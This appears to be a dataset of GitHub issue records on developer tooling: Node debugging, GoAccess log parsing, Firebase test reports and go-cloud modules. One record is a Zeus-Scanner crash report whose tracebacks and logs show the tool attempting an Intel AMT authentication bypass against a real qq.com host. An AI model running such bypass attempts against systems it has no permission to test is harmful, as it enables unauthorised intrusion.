| process | debugger doesn t work for processes which fork other processes i m running node inspect some node script js where some node script js uses plain run with defaults mostly calls to initialize few other processes internally right after that i receive message unable to open devtools socket address already in use node v node inspect some node script js debugger listening on port warning this is an experimental feature and could change at any time to start debugging open the following url in chrome chrome devtools devtools remote serve file inspector html experiments true true ws localhost unable to open devtools socket address already in use also forked process crashes so technically application doesn t run i ve skipped that part of a log to avoid not related noise behavior is same in both latest node js and tested on osx both el captain and sierra with latest chrome on board am i doing something wrong or there s no support currently for multi process node js apps i ve found similar which states that this probably should just work but gives no clue why it actually doesn t i ll be happy to provide simple test case if needed | 1 |
6,391 | 9,475,145,836 | IssuesEvent | 2019-04-19 10:03:38 | allinurl/goaccess | https://api.github.com/repos/allinurl/goaccess | closed | syncing logs from elb - live report | log-processing other question | Hey guys, i just tried GoAccess and it works like a charm once you get to know it.
It's not a issue but more of a logical question.
I am successful in parsing the s3/elb logs that are stored there with s3cmd sync command to EC2.
What i am trying to do is having that sync from s3 to GoAccess live - incrementally because sync works that way, only new logs are shipped and i want those new ones added to the report, not all of them.
If i put the command for report.html it parses the whole folder, not just the new ones that were copied.
Here is the command :
`find /tmp/s3/ -name "*.log" -exec cat {} \; | goaccess -a --log-format=AWSELB -p /usr/local/etc/goaccess/goaccess.conf -o /var/www/html/report.html --real-time-html`
Is there any possibility for goaccess to only parse the new logs in real time because my bucket is dozens of gigabytes ? I tried something with crontab but unsuccessful.
Thank you guys. | 1.0 | syncing logs from elb - live report - Hey guys, i just tried GoAccess and it works like a charm once you get to know it.
It's not a issue but more of a logical question.
I am successful in parsing the s3/elb logs that are stored there with s3cmd sync command to EC2.
What i am trying to do is having that sync from s3 to GoAccess live - incrementally because sync works that way, only new logs are shipped and i want those new ones added to the report, not all of them.
If i put the command for report.html it parses the whole folder, not just the new ones that were copied.
Here is the command :
`find /tmp/s3/ -name "*.log" -exec cat {} \; | goaccess -a --log-format=AWSELB -p /usr/local/etc/goaccess/goaccess.conf -o /var/www/html/report.html --real-time-html`
Is there any possibility for goaccess to only parse the new logs in real time because my bucket is dozens of gigabytes ? I tried something with crontab but unsuccessful.
Thank you guys. | process | syncing logs from elb live report hey guys i just tried goaccess and it works like a charm once you get to know it it s not a issue but more of a logical question i am successful in parsing the elb logs that are stored there with sync command to what i am trying to do is having that sync from to goaccess live incrementally because sync works that way only new logs are shipped and i want those new ones added to the report not all of them if i put the command for report html it parses the whole folder not just the new ones that were copied here is the command find tmp name log exec cat goaccess a log format awselb p usr local etc goaccess goaccess conf o var www html report html real time html is there any possibility for goaccess to only parse the new logs in real time because my bucket is dozens of gigabytes i tried something with crontab but unsuccessful thank you guys | 1 |
20,658 | 27,329,926,796 | IssuesEvent | 2023-02-25 13:49:16 | firebase/firebase-cpp-sdk | https://api.github.com/repos/firebase/firebase-cpp-sdk | reopened | [C++] Nightly Integration Testing Report | type: process nightly-testing | Note: This report excludes firestore. Please also check **[the report for firestore](https://github.com/firebase/firebase-cpp-sdk/issues/1178)**
***
<hidden value="integration-test-status-comment"></hidden>
### ✅ [build against repo] Integration test succeeded!
Requested by @DellaBitta on commit d2776f069acbd38a576e50de5229267886774ecc
Last updated: Sat Feb 25 02:57 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4269247883)**
<hidden value="integration-test-status-comment"></hidden>
***
### ✅ [build against SDK] Integration test succeeded!
Requested by @firebase-workflow-trigger[bot] on commit 1be7d248741115daaf5196413ed0d96428635796
Last updated: Fri Feb 24 15:15 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4262245158)**
<hidden value="integration-test-status-comment"></hidden>
| 1.0 | [C++] Nightly Integration Testing Report - Note: This report excludes firestore. Please also check **[the report for firestore](https://github.com/firebase/firebase-cpp-sdk/issues/1178)**
***
<hidden value="integration-test-status-comment"></hidden>
### ✅ [build against repo] Integration test succeeded!
Requested by @DellaBitta on commit d2776f069acbd38a576e50de5229267886774ecc
Last updated: Sat Feb 25 02:57 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4269247883)**
<hidden value="integration-test-status-comment"></hidden>
***
### ✅ [build against SDK] Integration test succeeded!
Requested by @firebase-workflow-trigger[bot] on commit 1be7d248741115daaf5196413ed0d96428635796
Last updated: Fri Feb 24 15:15 PST 2023
**[View integration test log & download artifacts](https://github.com/firebase/firebase-cpp-sdk/actions/runs/4262245158)**
<hidden value="integration-test-status-comment"></hidden>
| process | nightly integration testing report note this report excludes firestore please also check ✅ nbsp integration test succeeded requested by dellabitta on commit last updated sat feb pst ✅ nbsp integration test succeeded requested by firebase workflow trigger on commit last updated fri feb pst | 1 |
6,665 | 9,782,380,213 | IssuesEvent | 2019-06-07 23:19:28 | google/go-cloud | https://api.github.com/repos/google/go-cloud | closed | allmodules: mark modules into categories | enhancement process | Right now we have an `allmodules` file that just lists all the modules (directories where `go.mod` resides):
```
.
internal/cmd/gocdk
internal/contributebot
internal/website
samples
```
A couple of scripts use these lists of modules to perform tasks "for all modules in the repo".
As part of the work on #886, we'll need tooling to help with the release process. This tooling will need to distinguish between several categories of modules:
1. The root module (admittedly, it's easy as it's the only one that is `.`)
2. Submodules that we plan to release/track, such as separate providers split out from root as part of #886
3. Samples modules that import all the other released modules
4. Modules we use only internally and don't release. These don't need tagging
For example, prior to a release, a tool will have to add `replace` lines to all released modules that depend on root so they can be tested with the newest version. Same for `samples` depending on root and other released modules. Et cetera
| 1.0 | allmodules: mark modules into categories - Right now we have an `allmodules` file that just lists all the modules (directories where `go.mod` resides):
```
.
internal/cmd/gocdk
internal/contributebot
internal/website
samples
```
A couple of scripts use these lists of modules to perform tasks "for all modules in the repo".
As part of the work on #886, we'll need tooling to help with the release process. This tooling will need to distinguish between several categories of modules:
1. The root module (admittedly, it's easy as it's the only one that is `.`)
2. Submodules that we plan to release/track, such as separate providers split out from root as part of #886
3. Samples modules that import all the other released modules
4. Modules we use only internally and don't release. These don't need tagging
For example, prior to a release, a tool will have to add `replace` lines to all released modules that depend on root so they can be tested with the newest version. Same for `samples` depending on root and other released modules. Et cetera
| process | allmodules mark modules into categories right now we have an allmodules file that just lists all the modules directories where go mod resides internal cmd gocdk internal contributebot internal website samples a couple of scripts use these lists of modules to perform tasks for all modules in the repo as part of the work on we ll need tooling to help with the release process this tooling will need to distinguish between several categories of modules the root module admittedly it s easy as it s the only one that is submodules that we plan to release track such as separate providers split out from root as part of samples modules that import all the other released modules modules we use only internally and don t release these don t need tagging for example prior to a release a tool will have to add replace lines to all released modules that depend on root so they can be tested with the newest version same for samples depending on root and other released modules et cetera | 1 |
206,050 | 7,108,231,292 | IssuesEvent | 2018-01-16 23:01:52 | qlicker/qlicker | https://api.github.com/repos/qlicker/qlicker | closed | Prof run session should show percentage correct | Medium priority enhancement | The prof session panel should show the percentage of correct answers; perhaps inside the bar of the bar graph, the percentage of answers for each choice can be shown (the denominator should be the number of answers, not the number of students). | 1.0 | Prof run session should show percentage correct - The prof session panel should show the percentage of correct answers; perhaps inside the bar of the bar graph, the percentage of answers for each choice can be shown (the denominator should be the number of answers, not the number of students). | non_process | prof run session should show percentage correct the prof session panel should show the percentage of correct answers perhaps inside the bar of the bar graph the percentage of answers for each choice can be shown the denominator should be the number of answers not the number of students | 0 |
184,844 | 6,716,751,096 | IssuesEvent | 2017-10-14 12:48:54 | Ekultek/Zeus-Scanner | https://api.github.com/repos/Ekultek/Zeus-Scanner | closed | ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',)) | bug priority: low tool issue | Zeus version:
`1.0.46`
Firefox version:
``
Error info:
```Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
````
Running details:
`Linux-3.18.31-perf-g0bf156d-00991-gb62734d-aarch64-with-Kali-kali-rolling-kali-rolling`
Commands used:
`zeus.py -i -b http://oneday.qq.com/admin/nologin`
Log file info:
```2017-10-14 08:58:48,324;zeus-log;INFO;log file being saved to '/home/Scanner/Zeus-Scanner/log/zeus-log-1.log'...
2017-10-14 08:58:48,325;zeus-log;INFO;using default search engine...
2017-10-14 08:58:48,326;zeus-log;INFO;starting blackwidow on 'http://oneday.qq.com/admin/nologin'...
2017-10-14 08:58:48,683;zeus-log;INFO;successfully wrote found items to '/home/Scanner/Zeus-Scanner/log/blackwidow-log/blackwidow-log-1.log'...
2017-10-14 08:58:53,186;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:58:53,186;zeus-log;INFO;getting raw information...
2017-10-14 08:58:53,186;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:58:53,197;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:58:56,146;zeus-log;INFO;Zeus got an unexpected error and will automatically create an issue for this error, please wait...
2017-10-14 08:58:56,146;zeus-log;INFO;getting authorization...
2017-10-14 08:58:56,149;zeus-log;INFO;extracting traceback from log file...
2017-10-14 08:58:56,149;zeus-log;INFO;attempting to get firefox browser version...
2017-10-14 08:58:58,128;zeus-log;INFO;issue has been created successfully with the following name 'ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))'...
2017-10-14 08:59:01,580;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:59:01,581;zeus-log;INFO;getting raw information...
2017-10-14 08:59:01,583;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:59:01,612;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:59:03,105;zeus-log;INFO;[32mZeus got an unexpected error and will automatically create an issue for this error, please wait...[0m
2017-10-14 08:59:03,107;zeus-log;INFO;[32mgetting authorization...[0m
2017-10-14 08:59:03,111;zeus-log;INFO;[32mextracting traceback from log file...[0m
2017-10-14 08:59:03,114;zeus-log;INFO;[32mattempting to get firefox browser version...[0m
``` | 1.0 | ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',)) - Zeus version:
`1.0.46`
Firefox version:
``
Error info:
```Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
````
Running details:
`Linux-3.18.31-perf-g0bf156d-00991-gb62734d-aarch64-with-Kali-kali-rolling-kali-rolling`
Commands used:
`zeus.py -i -b http://oneday.qq.com/admin/nologin`
Log file info:
```2017-10-14 08:58:48,324;zeus-log;INFO;log file being saved to '/home/Scanner/Zeus-Scanner/log/zeus-log-1.log'...
2017-10-14 08:58:48,325;zeus-log;INFO;using default search engine...
2017-10-14 08:58:48,326;zeus-log;INFO;starting blackwidow on 'http://oneday.qq.com/admin/nologin'...
2017-10-14 08:58:48,683;zeus-log;INFO;successfully wrote found items to '/home/Scanner/Zeus-Scanner/log/blackwidow-log/blackwidow-log-1.log'...
2017-10-14 08:58:53,186;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:58:53,186;zeus-log;INFO;getting raw information...
2017-10-14 08:58:53,186;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:58:53,197;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:58:56,146;zeus-log;INFO;Zeus got an unexpected error and will automatically create an issue for this error, please wait...
2017-10-14 08:58:56,146;zeus-log;INFO;getting authorization...
2017-10-14 08:58:56,149;zeus-log;INFO;extracting traceback from log file...
2017-10-14 08:58:56,149;zeus-log;INFO;attempting to get firefox browser version...
2017-10-14 08:58:58,128;zeus-log;INFO;issue has been created successfully with the following name 'ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2c2f570>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))'...
2017-10-14 08:59:01,580;zeus-log;INFO;attempting to connect to 'http://tajs.qq.com' and get hardware info...
2017-10-14 08:59:01,581;zeus-log;INFO;getting raw information...
2017-10-14 08:59:01,583;zeus-log;INFO;header value not established, attempting to get bypass...
2017-10-14 08:59:01,612;zeus-log;ERROR;ran into exception 'HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))', cannot continue...
Traceback (most recent call last):
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 101, in main_intel_amt
json_data = __get_hardware(url, agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 59, in __get_hardware
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy)
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 51, in __get_raw_data
'Authorization': __get_auth_headers(target),
File "/home/Scanner/Zeus-Scanner/lib/attacks/intel_me/__init__.py", line 22, in __get_auth_headers
}, proxies=proxy)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 70, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 56, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 488, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 609, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 487, in send
raise ConnectionError(e, request=request)
ConnectionError: HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //tajs.qq.com:16992/index.htm (Caused by NewConnectionError('<requests.packages.urllib3.connection.HTTPConnection object at 0xf2b6e2f0>: Failed to establish a new connection: [Errno -5] No address associated with hostname',))
2017-10-14 08:59:03,105;zeus-log;INFO;[32mZeus got an unexpected error and will automatically create an issue for this error, please wait...[0m
2017-10-14 08:59:03,107;zeus-log;INFO;[32mgetting authorization...[0m
2017-10-14 08:59:03,111;zeus-log;INFO;[32mextracting traceback from log file...[0m
2017-10-14 08:59:03,114;zeus-log;INFO;[32mattempting to get firefox browser version...[0m
``` | non_process | connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus version firefox version error info traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req get raw data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus scanner lib attacks intel me init py line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req get raw data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus scanner lib attacks intel me init py line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname running details linux perf with kali kali rolling kali rolling commands used zeus py i b log file info zeus log info log file being saved to home scanner zeus scanner log zeus log log zeus log info using default search engine zeus log info starting blackwidow on zeus log info successfully wrote found items to home scanner zeus scanner log blackwidow log blackwidow log log zeus log info attempting to connect to and get hardware info zeus log info getting raw information zeus log info header value not established attempting to get bypass zeus log error ran into exception httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname cannot continue traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req get raw data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus scanner lib attacks intel me init py line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus log info zeus got an unexpected error and will automatically create an issue for this error please wait zeus log info getting authorization zeus log info extracting traceback from log file zeus log info attempting to get firefox browser version zeus log info issue has been created successfully with the following name connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus log info attempting to connect to and get hardware info zeus log info getting raw information zeus log info header value not established attempting to get bypass zeus log error ran into exception httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname cannot continue traceback most recent call last file home scanner zeus scanner lib attacks intel me init py line in main intel amt json data get hardware url agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get hardware req get raw data target hw sys agent agent proxy proxy file home scanner zeus scanner lib attacks intel me init py line in get raw data authorization get auth headers target file home scanner zeus scanner lib attacks intel me init py line in get auth headers proxies proxy file usr local lib dist packages requests api py line in get return request get url params params kwargs file usr local lib dist packages requests api py line in request return session request method method url url kwargs file usr local lib dist packages requests sessions py line in request resp self send prep send kwargs file usr local lib dist packages requests sessions py line in send r adapter send request kwargs file usr local lib dist packages requests adapters py line in send raise connectionerror e request request connectionerror httpconnectionpool host http port max retries exceeded with url tajs qq com index htm caused by newconnectionerror failed to establish a new connection no address associated with hostname zeus log info got an unexpected error and will automatically create an issue for this error please wait zeus log info authorization zeus log info traceback from log file zeus log info to get firefox browser version | 0 |
162,049 | 20,164,363,796 | IssuesEvent | 2022-02-10 01:45:43 | kapseliboi/dapp | https://api.github.com/repos/kapseliboi/dapp | opened | CVE-2021-27290 (High) detected in ssri-7.1.0.tgz, ssri-6.0.1.tgz | security vulnerability | ## CVE-2021-27290 - High Severity Vulnerability
